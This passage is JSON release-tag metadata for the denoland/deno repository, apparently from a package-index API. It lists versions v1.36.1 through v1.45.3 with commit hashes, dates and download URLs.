b73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T1